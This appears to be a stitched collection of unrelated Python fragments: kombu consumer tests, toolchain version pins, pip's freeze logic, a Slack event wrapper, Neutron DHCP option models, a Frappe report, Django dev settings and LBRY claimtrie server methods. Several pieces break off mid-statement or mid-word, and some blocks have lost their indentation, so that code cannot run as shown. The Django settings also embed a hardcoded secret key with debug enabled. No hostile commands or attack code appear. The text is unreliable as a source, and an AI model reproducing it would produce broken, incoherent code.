                             routing_key="rkey", durable=False,
                             auto_delete=True, exclusive=True)
        q2 = c2.queues[0]
        self.assertFalse(q2.durable)
        self.assertFalse(q2.exchange.durable)
        self.assertTrue(q2.auto_delete)
        self.assertTrue(q2.exchange.auto_delete)

    def test__enter__exit__(self, n="test__enter__exit__"):
        c = compat.Consumer(self.connection, queue=n, exchange=n,
                            routing_key="rkey")
        x = c.__enter__()
        self.assertIs(x, c)
        x.__exit__()
        self.assertIn("close", c.backend)
        self.assertTrue(c._closed)

    def test_iter(self, n="test_iterqueue"):
        c = compat.Consumer(self.connection, queue=n, exchange=n,
                            routing_key="rkey")
        c.close()

    def test_process_next(self, n="test_process_next"):
        c = compat.Consumer(self.connection, queue=n, exchange=n,
                            routing_key="rkey")
        self.assertRaises(NotImplementedError, c.process_next)
        c.close()

    def test_iterconsume(self, n="test_iterconsume"):
        c = compat.Consumer(self.connection, queue=n, exchange=n,
                            routing_key="rkey")
        c.close()

    def test_discard_all(self, n="test_discard_all"):
        c = compat.Consumer(self.connection, queue=n, exchange=n,
                            routing_key="rkey")
        c.discard_all()
        self.assertIn("queue_purge", c.backend)

    def test_fetch(self, n="test_fetch"):
        c = compat.Consumer(self.connection, queue=n, exchange=n,
                            routing_key="rkey")
        # Empty queue: fetch returns None but still issues basic_get.
        self.assertIsNone(c.fetch())
        self.assertIsNone(c.fetch(no_ack=True))
        self.assertIn("basic_get", c.backend)
        callback_called = [False]

        def receive(payload, message):
            callback_called[0] = True

        c.backend.to_deliver.append("42")
        self.assertEqual(c.fetch().payload, "42")
        c.backend.to_deliver.append("46")
        c.register_callback(receive)
        # Registered callbacks only fire when explicitly enabled.
        self.assertEqual(c.fetch(enable_callbacks=True).payload, "46")
        self.assertTrue(callback_called[0])

    def test_discard_all_filterfunc_not_supported(self, n="xjf21j21"):
        c = compat.Consumer(self.connection, queue=n, exchange=n,
                            routing_key="rkey")
        self.assertRaises(NotImplementedError, c.discard_all,
                          filterfunc=lambda x: x)
        c.close()

    def test_wait(self, n="test_wait"):

        class C(compat.Consumer):

            def iterconsume(self, limit=None):
                for i in range(limit):
                    yield i

        c = C(self.connection, queue=n, exchange=n,
              routing_key="rkey")
        self.assertEqual(c.wait(10), range(10))
        c.close()

    def test_iterqueue(self, n="test_iterqueue"):
        i = [0]

        class C(compat.Consumer):

            def fetch(self, limit=None):
                z = i[0]
                i[0] += 1
                return z

        c = C(self.connection, queue=n, exchange=n,
              routing_key="rkey")
        self.assertEqual(list(c.iterqueue(limit=10)), range(10))
        c.close()
class test_ConsumerSet(unittest.TestCase):
def setUp(self):
self.connection = BrokerConnection(transport=Transport)
def test_constructor(self, prefix="0daf8h21"):
dcon = {"%s.xyx" % prefix: {"exchange": "%s.xyx" % prefix,
"routing_key": "xyx"},
"%s.xyz" % prefix: {"exchange": "%s.xyz" % prefix,
"routing_key": "xyz"}}
consumers = [compat.Consumer(self.connection, queue=prefix + str(i),
exchange=prefix + str(i))
for i in range(3)]
c = compat.ConsumerSet(self.connection, consumers=consumers)
c2 = compat.ConsumerSet(self.connection, from_dict=dcon)
self.assertEqual(len(c.queues), 3)
self.a |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# Pinned versions of the MSVC-toolchain dependencies fetched for Windows
# builds; keys are dependency names, values are exact version strings.
WINDOWS_MSVC = {
    "cmake": "3.7.2",
    "llvm": "6.0.0",
    "moztools": "0.0.1-5",
    "ninja": "1.7.1",
    "openssl": "1.1.0e-vs2015",
}
|
from __future__ import absolute_import
import logging
import re
import pip
from pip.req import InstallRequirement
from pip.req.req_file import COMMENT_RE
from pip.utils import get_installed_distributions
from pip._vendor import pkg_resources
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.pkg_resources import RequirementParseError
logger = logging.getLogger(__name__)
def freeze(
        requirement=None,
        find_links=None, local_only=None, user_only=None, skip_regex=None,
        default_vcs=None,
        isolated=False,
        wheel_cache=None,
        skip=()):
    """Yield the lines of a ``pip freeze`` style requirements listing.

    When ``requirement`` (an iterable of requirements-file paths) is given,
    the output mirrors those files: option lines are re-emitted once,
    editable and named requirements are replaced by the installed pins, and
    anything installed but not listed is appended under a trailing banner.
    """
    find_links = find_links or []
    skip_match = None
    if skip_regex:
        skip_match = re.compile(skip_regex).search
    # Collect dependency links from installed dists and from any
    # find-links entry that pins an egg.
    dependency_links = []
    for dist in pkg_resources.working_set:
        if dist.has_metadata('dependency_links.txt'):
            dependency_links.extend(
                dist.get_metadata_lines('dependency_links.txt')
            )
    for link in find_links:
        if '#egg=' in link:
            dependency_links.append(link)
    for link in find_links:
        yield '-f %s' % link
    installations = {}
    for dist in get_installed_distributions(local_only=local_only,
                                            skip=(),
                                            user_only=user_only):
        try:
            req = pip.FrozenRequirement.from_dist(
                dist,
                dependency_links
            )
        except RequirementParseError:
            # Unparsable requirements are reported but do not abort the
            # whole freeze.
            logger.warning(
                "Could not parse requirement: %s",
                dist.project_name
            )
            continue
        installations[req.name] = req
    if requirement:
        # the options that don't get turned into an InstallRequirement
        # should only be emitted once, even if the same option is in multiple
        # requirements files, so we need to keep track of what has been emitted
        # so that we don't emit it again if it's seen again
        emitted_options = set()
        for req_file_path in requirement:
            with open(req_file_path) as req_file:
                for line in req_file:
                    if (not line.strip() or
                            line.strip().startswith('#') or
                            (skip_match and skip_match(line)) or
                            line.startswith((
                                '-r', '--requirement',
                                '-Z', '--always-unzip',
                                '-f', '--find-links',
                                '-i', '--index-url',
                                '--pre',
                                '--trusted-host',
                                '--process-dependency-links',
                                '--extra-index-url'))):
                        # Blank lines, comments and option lines pass
                        # through unchanged (options only once).
                        line = line.rstrip()
                        if line not in emitted_options:
                            emitted_options.add(line)
                            yield line
                        continue
                    if line.startswith('-e') or line.startswith('--editable'):
                        if line.startswith('-e'):
                            line = line[2:].strip()
                        else:
                            line = line[len('--editable'):].strip().lstrip('=')
                        line_req = InstallRequirement.from_editable(
                            line,
                            default_vcs=default_vcs,
                            isolated=isolated,
                            wheel_cache=wheel_cache,
                        )
                    else:
                        line_req = InstallRequirement.from_line(
                            COMMENT_RE.sub('', line).strip(),
                            isolated=isolated,
                            wheel_cache=wheel_cache,
                        )
                    if not line_req.name:
                        logger.info(
                            "Skipping line in requirement file [%s] because "
                            "it's not clear what it would install: %s",
                            req_file_path, line.strip(),
                        )
                        logger.info(
                            " (add #egg=PackageName to the URL to avoid"
                            " this warning)"
                        )
                    elif line_req.name not in installations:
                        logger.warning(
                            "Requirement file [%s] contains %s, but that "
                            "package is not installed",
                            req_file_path, COMMENT_RE.sub('', line).strip(),
                        )
                    else:
                        yield str(installations[line_req.name]).rstrip()
                        del installations[line_req.name]
        yield(
            '## The following requirements were added by '
            'pip freeze:'
        )
    # Whatever is installed but was not mentioned in any requirements file.
    for installation in sorted(
            installations.values(), key=lambda x: x.name.lower()):
        if canonicalize_name(installation.name) not in skip:
            yield str(installation).rstrip()
|
"""
slackrealtime/event.py - Event handling for Slack RTM.
Copyright 2014-2020 Michael Farrell <http://micolous.id.au>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from datetime import datetime
from pytz import utc
class BaseEvent(object):
    """Wraps a raw Slack RTM event dict and exposes its keys as attributes."""

    def __init__(self, body):
        self._b = body
        # Not all events carry their own timestamp.
        self.has_ts = 'ts' in self._b
        if self.has_ts:
            # The message carries a timestamp; parse it as aware UTC.
            self.ts = datetime.fromtimestamp(float(self._b['ts']), utc)
            self.raw_ts = self._b['ts']
        else:
            # No timestamp present; infer it from the receive time.
            self.ts = datetime.now(utc)
            self.raw_ts = None

    def __getattr__(self, attr):
        # Fall back to the raw event body for unknown attributes.
        attr = str(attr)
        try:
            return self._b[attr]
        except KeyError:
            raise AttributeError(attr)

    def copy(self):
        # Re-decode the raw body so the copy gets the right wrapper class.
        return decode_event(self._b)

    def __str__(self):
        return '<BaseEvent: @%r %r>' % (self.ts, self._b)
class Unknown(BaseEvent):
    # Fallback wrapper for event types with no dedicated class (see decode_event).
    def __str__(self):
        return '<Unknown: @%r %r>' % (self.ts, self._b)
class Hello(BaseEvent):
    # Sent by Slack once the RTM connection is established.
    pass
class Message(BaseEvent):
    """A chat message event; fields that bot messages omit read as None."""

    def __getattr__(self, attr):
        try:
            return super(Message, self).__getattr__(attr)
        except AttributeError:
            # Bot message types are different: several fields regular
            # messages carry are simply absent, so report them as None.
            if attr in ('user', 'username', 'subtype', 'attachments', 'thread_ts', 'text'):
                return None
            # Raise other AttributeErrors
            raise

    def __str__(self):
        subtype = self.subtype or ''
        if self.user is None:
            # Bot message: fall back to the bot's username.
            user = self.username
        else:
            user = u'@' + self.user
        attachments = ''
        if self.attachments:
            attachments = ' attachments=' + repr(self.attachments)
        # Keep long attachment dumps readable.
        if len(attachments) > 40:
            attachments = attachments[:37] + '...'
        return '<Message(%s): %s: <%s> %s %s>' % (subtype, self.channel, user, self.text, attachments)
class BaseHistoryChanged(BaseEvent):
    # Shared base for *_history_changed events: parses the 'latest' and
    # 'event_ts' fields into aware UTC datetimes.
    def __init__(self, body):
        super(BaseHistoryChanged, self).__init__(body)
        self.latest = datetime.fromtimestamp(float(self._b['latest']), utc)
        self.event_ts = datetime.fromtimestamp(float(self._b['event_ts']), utc)
class BaseReactionEvent(BaseEvent):
    # Shared base for reaction_added/removed events: parses 'event_ts'
    # into an aware UTC datetime.
    def __init__(self, body):
        super(BaseReactionEvent, self).__init__(body)
        self.event_ts = datetime.fromtimestamp(float(self._b['event_ts']), utc)
# One thin marker subclass per RTM event type, so consumers can dispatch on
# the wrapper's Python type; none of these add behaviour of their own.
class Ack(BaseEvent): pass
class ChannelArchive(BaseEvent): pass
class ChannelCreated(BaseEvent): pass
class ChannelDeleted(BaseEvent): pass
class ChannelHistoryChanged(BaseHistoryChanged): pass
class ChannelJoined(BaseEvent): pass
class ChannelLeft(BaseEvent): pass
class ChannelMarked(BaseEvent): pass
class ChannelRename(BaseEvent): pass
class ChannelUnarchive(BaseEvent): pass
class ImClose(BaseEvent): pass
class ImCreated(BaseEvent): pass
class ImHistoryChanged(BaseHistoryChanged): pass
class ImMarked(BaseEvent): pass
class ImOpen(BaseEvent): pass
class GroupJoined(BaseEvent): pass
class GroupLeft(BaseEvent): pass
class GroupOpen(BaseEvent): pass
class GroupClose(BaseEvent): pass
class GroupArchive(BaseEvent): pass
class GroupUnarchive(BaseEvent): pass
class GroupRename(BaseEvent): pass
class GroupMarked(BaseEvent): pass
class GroupHistoryChanged(BaseHistoryChanged): pass
class BotAdded(BaseEvent): pass
class BotChanged(BaseEvent): pass
class ReactionAdded(BaseReactionEvent): pass
class ReactionRemoved(BaseReactionEvent): pass
class PresenceChange(BaseEvent): pass
class UserChange(BaseEvent): pass
class UserTyping(BaseEvent): pass
class TeamPrefChange(BaseEvent): pass
class TeamJoin(BaseEvent): pass
# Maps the RTM event 'type' string to its wrapper class; types not listed
# here fall back to Unknown in decode_event.
EVENT_HANDLERS = {
	u'hello': Hello,
	u'message': Message,
	u'channel_archive': ChannelArchive,
	u'channel_created': ChannelCreated,
	u'channel_deleted': ChannelDeleted,
	u'channel_history_changed': ChannelHistoryChanged,
	u'channel_joined': ChannelJoined,
	u'channel_left': ChannelLeft,
	u'channel_marked': ChannelMarked,
	u'channel_rename': ChannelRename,
	u'channel_unarchive': ChannelUnarchive,
	u'im_close': ImClose,
	u'im_created': ImCreated,
	u'im_history_changed': ImHistoryChanged,
	u'im_marked': ImMarked,
	u'im_open': ImOpen,
	u'group_joined': GroupJoined,
	u'group_left': GroupLeft,
	u'group_open': GroupOpen,
	u'group_close': GroupClose,
	u'group_archive': GroupArchive,
	u'group_unarchive': GroupUnarchive,
	u'group_rename': GroupRename,
	u'group_marked': GroupMarked,
	u'group_history_changed': GroupHistoryChanged,
	u'bot_added': BotAdded,
	u'bot_changed': BotChanged,
	u'reaction_added': ReactionAdded,
	u'reaction_removed': ReactionRemoved,
	u'presence_change': PresenceChange,
	u'user_change': UserChange,
	u'user_typing': UserTyping,
	u'team_pref_change': TeamPrefChange,
	u'team_join': TeamJoin,
}
def decode_event(event):
    """Wrap a raw RTM event dict in the matching event class.

    Events without a 'type' key are acknowledgements of previously sent
    commands; unrecognised types fall back to Unknown.
    """
    event = event.copy()
    if 'type' not in event:
        # This is an acknowledgement of a previous command.
        return Ack(event)
    handler = EVENT_HANDLERS.get(event['type'], Unknown)
    return handler(event)
|
# Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.api.v2 import attributes
from neutron.db import db_base_plugin_v2
from neutron.db import model_base
from neutron.db import models_v2
from neutron.extensions import extra_dhcp_opt as edo_ext
class ExtraDhcpOpt(model_base.BASEV2, model_base.HasId):
    """Represent a generic concept of extra options associated to a port.
    Each port may have none to many dhcp opts associated to it that can
    define specifically different or extra options to DHCP clients.
    These will be written to the <network_id>/opts files, and each option's
    tag will be referenced in the <network_id>/host file.
    """
    # Owning port; row is removed automatically when the port is deleted.
    port_id = sa.Column(sa.String(36),
                        sa.ForeignKey('ports.id', ondelete="CASCADE"),
                        nullable=False)
    # DHCP option name and its value, both mandatory.
    opt_name = sa.Column(sa.String(64), nullable=False)
    opt_value = sa.Column(sa.String(255), nullable=False)
    # IP version the option applies to; defaults to IPv4 at the DB level.
    ip_version = sa.Column(sa.Integer, server_default='4', nullable=False)
    # A port may define each option name at most once per IP version.
    __table_args__ = (sa.UniqueConstraint(
        'port_id',
        'opt_name',
        'ip_version',
        name='uniq_extradhcpopts0portid0optname0ipversion'),
        model_base.BASEV2.__table_args__,)

    # Add a relationship to the Port model in order to instruct SQLAlchemy to
    # eagerly load extra_dhcp_opts bindings
    ports = orm.relationship(
        models_v2.Port,
        backref=orm.backref("dhcp_opts", lazy='joined', cascade='delete'))
class ExtraDhcpOptMixin(object):
    """Mixin class to add extra options to the DHCP opts file
    and associate them to a port.
    """

    def _is_valid_opt_value(self, opt_name, opt_value):
        # If the dhcp opt is blank-able, it shouldn't be saved to the DB in
        # case that the value is None
        if opt_name in edo_ext.VALID_BLANK_EXTRA_DHCP_OPTS:
            return opt_value is not None
        # Otherwise, it shouldn't be saved to the DB in case that the value
        # is None or empty
        return bool(opt_value)

    def _process_port_create_extra_dhcp_opts(self, context, port,
                                             extra_dhcp_opts):
        # Persist every valid option for a freshly created port, then
        # reflect the stored bindings back into the port dict.
        if not extra_dhcp_opts:
            return port
        with context.session.begin(subtransactions=True):
            for dopt in extra_dhcp_opts:
                if self._is_valid_opt_value(dopt['opt_name'],
                                            dopt['opt_value']):
                    ip_version = dopt.get('ip_version', 4)
                    db = ExtraDhcpOpt(
                        port_id=port['id'],
                        opt_name=dopt['opt_name'],
                        opt_value=dopt['opt_value'],
                        ip_version=ip_version)
                    context.session.add(db)
        return self._extend_port_extra_dhcp_opts_dict(context, port)

    def _extend_port_extra_dhcp_opts_dict(self, context, port):
        # Populate the extra-dhcp-opts attribute on the port dict from the DB.
        port[edo_ext.EXTRADHCPOPTS] = self._get_port_extra_dhcp_opts_binding(
            context, port['id'])

    def _get_port_extra_dhcp_opts_binding(self, context, port_id):
        query = self._model_query(context, ExtraDhcpOpt)
        binding = query.filter(ExtraDhcpOpt.port_id == port_id)
        return [{'opt_name': r.opt_name, 'opt_value': r.opt_value,
                 'ip_version': r.ip_version}
                for r in binding]

    def _update_extra_dhcp_opts_on_port(self, context, id, port,
                                        updated_port=None):
        # It is not necessary to update in a transaction, because
        # it's called from within one from ovs_neutron_plugin.
        dopts = port['port'].get(edo_ext.EXTRADHCPOPTS)
        if dopts:
            opt_db = self._model_query(
                context, ExtraDhcpOpt).filter_by(port_id=id).all()
            # if there are currently no dhcp_options associated to
            # this port, Then just insert the new ones and be done.
            with context.session.begin(subtransactions=True):
                for upd_rec in dopts:
                    for opt in opt_db:
                        if (opt['opt_name'] == upd_rec['opt_name']
                                and opt['ip_version'] == upd_rec.get(
                                    'ip_version', 4)):
                            # to handle deleting of a opt from the port.
                            if upd_rec['opt_value'] is None:
                                context.session.delete(opt)
                            else:
                                if (self._is_valid_opt_value(
                                        opt['opt_name'],
                                        upd_rec['opt_value']) and
                                        opt['opt_value'] !=
                                        upd_rec['opt_value']):
                                    opt.update(
                                        {'opt_value': upd_rec['opt_value']})
                            break
                    else:
                        # No existing row matched: insert a brand-new option.
                        if self._is_valid_opt_value(
                                upd_rec['opt_name'],
                                upd_rec['opt_value']):
                            ip_version = upd_rec.get('ip_version', 4)
                            db = ExtraDhcpOpt(
                                port_id=id,
                                opt_name=upd_rec['opt_name'],
                                opt_value=upd_rec['opt_value'],
                                ip_version=ip_version)
                            context.session.add(db)
            if updated_port:
                edolist = self._get_port_extra_dhcp_opts_binding(context, id)
                updated_port[edo_ext.EXTRADHCPOPTS] = edolist
        return bool(dopts)

    def _extend_port_dict_extra_dhcp_opt(self, res, port):
        res[edo_ext.EXTRADHCPOPTS] = [{'opt_name': dho.opt_name,
                                       'opt_value': dho.opt_value,
                                       'ip_version': dho.ip_version}
                                      for dho in port.dhcp_opts]
        return res
# Ensure port dicts returned by the core plugin include the extra DHCP opts.
db_base_plugin_v2.NeutronDbPluginV2.register_dict_extend_funcs(
    attributes.PORTS, ['_extend_port_dict_extra_dhcp_opt'])
|
# Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and Contributors and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, json
def execute(filters=None):
    """BOM search report: list BOMs / Sales BOMs containing the filtered items.

    When ``search_sub_assemblies`` is set, exploded BOM items are searched
    instead of first-level BOM items. Returns (columns, data).
    """
    data = []
    parents = {
        "Sales BOM Item": "Sales BOM",
        "BOM Explosion Item": "BOM",
        "BOM Item": "BOM"
    }
    for doctype in ("Sales BOM Item",
        "BOM Explosion Item" if filters.search_sub_assemblies else "BOM Item"):
        all_boms = {}
        for d in frappe.get_all(doctype, fields=["parent", "item_code"]):
            all_boms.setdefault(d.parent, []).append(d.item_code)
        for parent, items in all_boms.iteritems():
            valid = True
            for key, item in filters.iteritems():
                # every filter other than the search-mode flag must name an
                # item present in this BOM
                if key != "search_sub_assemblies":
                    if item and item not in items:
                        valid = False
            if valid:
                data.append((parent, parents[doctype]))
    return [{
        "fieldname": "parent",
        "label": "BOM",
        "width": 200,
        "fieldtype": "Dynamic Link",
        "options": "doctype"
    },
    {
        "fieldname": "doctype",
        "label": "Type",
        "width": 200,
        "fieldtype": "Data"
    }], data
|
"""
T | emplate tags for reversion application.
" | ""
|
"""
Django settings for proxyme project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import tempfile
BASE_DIR = os.path.dirname(os.path.dirname(__file__))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '#z$gq7gm+w@6i44)!0n&c=om1x#6e^lj^=hf*e8r7^p*irrj-y'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'proxy',
    'clear_cache'
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'proxy.middleware.ProxyRequest',
    'django.middleware.gzip.GZipMiddleware'
)
ROOT_URLCONF = 'proxyme.urls'
WSGI_APPLICATION = 'proxyme.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
    os.path.join(BASE_DIR, 'templates'),
)

# File-based response cache used by the proxy middleware.
CACHES = {
    'default': {
        'BACKEND': 'proxy.cache.backend.FileBasedCache',
        'LOCATION': os.path.join(tempfile.gettempdir(), 'webcache'),
        'TIMEOUT': 1800,
        'OPTIONS': {
            'MAX_ENTRIES': 10000
        }
    }
}
n_info = await self.daemon.getrawtransaction(tx_hash, True)
if transaction_info and 'hex' in transaction_info and 'confirmations' in transaction_info:
# an unconfirmed transaction from lbrycrdd will not have a 'confirmations' field
return (self.db.db_height - transaction_info['confirmations']) + 1
elif transaction_info and 'hex' in transaction_info:
return -1
return None
    async def claimtrie_getclaimssignedby(self, name):
        """Formatted claims signed by the certificate currently winning ``name``.

        Returns None when the name has no winning claim.
        """
        winning_claim = await self.daemon.getvalueforname(name)
        if winning_claim:
            return await self.claimtrie_getclaimssignedbyid(winning_claim['claimId'])
    async def claimtrie_getclaimssignedbyid(self, certificate_id):
        """Formatted claims signed by the given certificate claim id (hex)."""
        claim_ids = self.get_claim_ids_signed_by(certificate_id)
        return await self.batched_formatted_claims_from_daemon(claim_ids)
def claimtrie_getclaimssignedbyidminimal(self, certificate_id):
claim_ids = self.get_claim_ids_signed_by(certificate_id)
ret = []
for claim_id in claim_ids:
raw_claim_id = unhexlify(claim_id)[::-1]
info = self.db.get_claim_info(raw_claim_id)
if info:
ret.append({
'claim_id': claim_id,
'height': info.height,
'name': info.name.decode()
})
return ret
def get_claim_ids_signed_by(self, certificate_id):
raw_certificate_id = unhexlify(certificate_id)[::-1]
raw_claim_ids = self.db.get_signed_claim_ids_by_cert_id(raw_certificate_id)
return list(map(hash_to_hex_str, raw_claim_ids))
async def claimtrie_getclaimssignedbynthtoname(self, name, n):
claim = self.claimtrie_getnthclaimforname(name, n)
if claim and 'claim_id' in claim:
return await self.claimtrie_getclaimssignedbyid(hash_to_hex_str(claim['claim_id']))
    async def claimtrie_getclaimsintx(self, txid):
        """Formatted claims made in the given transaction."""
        # TODO: this needs further discussion.
        # Code on lbryum-server is wrong and we need to gather what we clearly expect from this command
        claim_ids = [claim['claimId'] for claim in (await self.daemon.getclaimsfortx(txid)) if 'claimId' in claim]
        return await self.batched_formatted_claims_from_daemon(claim_ids)
    async def claimtrie_getvalue(self, name, block_hash=None):
        """Name proof plus, when the proof has a winning claim, that claim's data."""
        proof = await self.daemon.getnameproof(name, block_hash)
        result = {'proof': proof, 'supports': []}
        if proof_has_winning_claim(proof):
            tx_hash, nout = proof['txhash'], int(proof['nOut'])
            transaction_info = await self.daemon.getrawtransaction(tx_hash, True)
            result['transaction'] = transaction_info['hex']  # should have never included this (or the call to get it)
            # DB is keyed on the byte-reversed binary txid.
            raw_claim_id = self.db.get_claim_id_from_outpoint(unhexlify(tx_hash)[::-1], nout)
            claim_id = hexlify(raw_claim_id[::-1]).decode()
            claim = await self.claimtrie_getclaimbyid(claim_id)
            result.update(claim)
        return result
async def claimtrie_getnthclaimforname(self, name, n):
n = int(n)
result = await self.claimtrie_getclaimsforname(name)
if 'claims' in result and len(result['claims']) > n >= 0:
# TODO: revist this after lbrycrd_#209 to see if we can sort by claim_sequence at this point
result['claims'].sort(key=lambda c: (int(c['height']), int(c['nout'])))
result['claims'][n]['claim_sequence'] = n
| return result['claims'][n]
async def claimtrie_getpartialmatch(self, name, part):
result = await self.claimtrie_getclaimsforname(name)
if 'claims' in result:
return next(filter(lambda x: x['claim_id'].starts_with(part), result['claims']), None)
async def claimtrie_getclaimsforname(self, name):
claims = await self.daemon.getclaimsforname(name)
if claims:
claims['cl | aims'] = [self.format_claim_from_daemon(claim, name) for claim in claims['claims']]
claims['supports_without_claims'] = [] # fixme temporary
del claims['supports without claims']
claims['last_takeover_height'] = claims['nLastTakeoverHeight']
del claims['nLastTakeoverHeight']
return claims
return {}
async def batched_formatted_claims_from_daemon(self, claim_ids):
claims = await self.daemon.getclaimsbyids(claim_ids)
result = []
for claim in claims:
if claim and claim.get('value'):
result.append(self.format_claim_from_daemon(claim))
return result
    def format_claim_from_daemon(self, claim, name=None):
        """Changes the returned claim data to the format expected by lbry and adds missing fields."""
        if not claim:
            return {}
        # this ISO-8859 nonsense stems from a nasty form of encoding extended characters in lbrycrd
        # it will be fixed after the lbrycrd upstream merge to v17 is done
        # it originated as a fear of terminals not supporting unicode. alas, they all do
        if 'name' in claim:
            name = claim['name'].encode('ISO-8859-1').decode()
        # Address comes from the local index; daemon data alone lacks it.
        info = self.db.sql.get_claims(claim_id=claim['claimId'])
        if not info:
            # raise RPCError("Lbrycrd has {} but not lbryumx, please submit a bug report.".format(claim_id))
            return {}
        address = info.address.decode()
        # fixme: temporary
        #supports = self.format_supports_from_daemon(claim.get('supports', []))
        supports = []
        # The daemon has used both spellings of these keys across versions.
        amount = get_from_possible_keys(claim, 'amount', 'nAmount')
        height = get_from_possible_keys(claim, 'height', 'nHeight')
        effective_amount = get_from_possible_keys(claim, 'effective amount', 'nEffectiveAmount')
        valid_at_height = get_from_possible_keys(claim, 'valid at height', 'nValidAtHeight')
        result = {
            "name": name,
            "claim_id": claim['claimId'],
            "txid": claim['txid'],
            "nout": claim['n'],
            "amount": amount,
            # depth counts blocks from the chain tip (1 == claim in tip block)
            "depth": self.db.db_height - height + 1,
            "height": height,
            "value": hexlify(claim['value'].encode('ISO-8859-1')).decode(),
            "address": address,  # from index
            "supports": supports,
            "effective_amount": effective_amount,
            "valid_at_height": valid_at_height
        }
        if 'claim_sequence' in claim:
            # TODO: ensure that lbrycrd #209 fills in this value
            result['claim_sequence'] = claim['claim_sequence']
        else:
            result['claim_sequence'] = -1
        if 'normalized_name' in claim:
            result['normalized_name'] = claim['normalized_name'].encode('ISO-8859-1').decode()
        return result
def format_supports_from_daemon(self, supports):
return [[support['txid'], support['n'], get_from_possible_keys(support, 'amount', 'nAmount')] for
support in supports]
    async def claimtrie_getclaimbyid(self, claim_id):
        """Fetch and format a single claim by its hex id; {} when unknown."""
        self.assert_claim_id(claim_id)
        claim = await self.daemon.getclaimbyid(claim_id)
        return self.format_claim_from_daemon(claim)
    async def claimtrie_getclaimsbyids(self, *claim_ids):
        """Map each requested claim id to its formatted claim."""
        claims = await self.batched_formatted_claims_from_daemon(claim_ids)
        # NOTE(review): batched_formatted_claims_from_daemon drops empty
        # results, so ids and claims could misalign here — verify upstream.
        return dict(zip(claim_ids, claims))
def assert_tx_hash(self, value):
'''Raise an RPCError if the value is not a valid transaction
hash.'''
try:
if len(util.hex_to_bytes(value)) == 32:
return
except Exception:
pass
raise RPCError(1, f'{value} should be a transaction hash')
def assert_claim_id(self, value):
'''Raise an RPCError if the value is not a valid claim id
hash.'''
try:
if len(util.hex_to_bytes(value)) == 20:
return
except Exception:
pass
raise RPCError(1, f'{value} should be a claim id hash')
def normalize_name(self, name):
# this is designed to match lbrycrd; change it here if it changes there
return u |
import functools
import typing
import inspect
import itertools
import supycache
from telegram import Bot, User
@supycache.supycache(cache_key='admin_ids_{1}', max_age=10 * 60)
def get_admin_ids(bot: Bot, chat_id):
    """Return the user ids of the chat's administrators (cached for 10 minutes)."""
    return [admin.user.id for admin in bot.get_chat_administrators(chat_id)]
def is_user_group_admin(bot: Bot, user_id, chat_id_, admin_id):
    """Check whether ``user_id`` administers chat ``chat_id_``.

    Always False when the chat is the admin's own private chat.
    """
    return chat_id_ != admin_id and user_id in get_admin_ids(bot, chat_id_)
def get_username_or_name(user: User):
    """Best human-readable identifier: username, else full name, else first name."""
    if user.username:
        return user.username
    display_name = user.first_name
    if user.last_name:
        display_name = '%s %s' % (display_name, user.last_name)
    return display_name
def parse_callback_data(data: str) -> typing.Tuple[str, str]:
    """Split callback data of the form ``"<module>/<payload>"`` into its parts."""
    module_name, payload = data.split('/', maxsplit=1)
    return module_name, payload
def get_callback_data(data: str) -> str:
    """Return only the payload part of callback data, dropping the module prefix."""
    _, payload = data.split('/', maxsplit=1)
    return payload
def set_callback_data(data: str) -> str:
    """
    Helper that prefixes ``data`` with the name of the module it is called from.

    Needed so we can later tell which handler should process the CallbackQuery.
    """
    # Inspect the caller's frame to get the calling module's short name.
    module = inspect.currentframe().f_back.f_globals['__name__'].split('.')[-1]
    return f'{module}/{data}'
def process_callback_query(func):
    """Run the CallbackQueryHandler only when the callback_data names the decorated module."""
    # Short name of the module that applied this decorator.
